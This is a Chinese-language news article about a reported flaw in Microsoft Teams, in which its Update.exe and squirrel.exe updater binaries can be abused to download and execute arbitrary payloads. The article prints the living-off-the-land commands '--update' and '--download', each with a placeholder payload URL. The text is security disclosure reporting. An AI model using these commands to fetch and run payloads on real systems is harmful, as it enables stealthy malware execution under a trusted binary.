内容简介:雷锋网研究人员表示,对易受攻击的应用程序使用“update”命令可以在当前用户的上下文中执行任意二进制文件。目前,研究人员已向微软报告了这个问题。使用Microsoft Teams,将有效负载添加到其文件夹中,并使用以下任一命令自动执行:
雷锋网 (公众号:雷锋网) 消息,据 BleepingComputer 美国时间 6 月 29 日报道, 多位安全研究人员发现当前在Microsoft Teams桌面应用中实现的“update”升级机制允许黑客在系统上下载和执行任意文件,
研究人员表示,对易受攻击的应用程序使用“update”命令可以在当前用户的上下文中执行任意二进制文件。目前,研究人员已向微软报告了这个问题。
使用Microsoft Teams,将有效负载添加到其文件夹中,并使用以下任一命令自动执行:
Update.exe --update [url to payload] squirrel.exe --update [url to payload]
这些命令可以与其他参数一起使用,包括“download”,它允许从远程位置以NuGet包的形式检索有效负载。
Update.exe --download [url to payload] squirrel.exe --download [url to payload]
相同的方法适用于“squirrel.exe”,它也是Microsoft Teams安装包的一部分。这两个可执行文件现在都是GitHub上的Living Off The Land Binaries and Scripts(LOLBAS)数据库的一部分。
安全研究员 Reegun Richard 在 6 月 4 日向微软团队报告了这个问题。此时,应用程序仍然容易受到攻击,因为微软通知研究员该修复程序将在未来的软件版本中出现。
来源: BleepingComputer 。
雷锋网版权文章,未经授权禁止转载。详情见 转载须知 。
以上所述就是小编给大家介绍的《Microsoft Teams 升级机制允许黑客执行任意文件》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!
猜你喜欢:
- 新型漏洞thunderclap 允许黑客用数据线攻击PC
- 【安全帮】Microsoft Teams 升级机制允许黑客执行任意文件
- macOS零日漏洞曝光,允许黑客绕过系统安全功能执行恶意代码
- Windows严重漏洞披露:允许黑客将管理员权限转移给来宾账户
- 新发现的thunderclap漏洞允许黑客使用Thunderbolt/USB-C外设攻击PC
- BUF早餐铺 | 俄罗斯测试脱离国际互联网;WordPress曝出插件漏洞,允许任何用户接管网站;黑客正在...
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
算法概论
Sanjoy Dasgupta、Christos Papadimitriou、Umesh Vazirani / 钱枫 注、邹恒明 注 / 机械工业出版社 / 2009-1 / 55.00元
《算法概论(注释版)》源自加州大学伯克利分校和加州大学圣迭戈分校本科生的算法课讲义,以独特的视角展现了算法设计的精巧技术及魅力。在表达每一种技术时,强调每个算法背后的简洁数学思想,分析其时间和空间效率,运用与其他技术类比的方法来说明特征,并提供了大量实例。《算法概论(注释版)》以人类最古老的算法(算术运算)为起点,将各种算法中优美而有代表性的内容囊括书中,并以最前沿的理论(量子算法)结束,构成了较......一起来看看 《算法概论》 这本书的介绍吧!
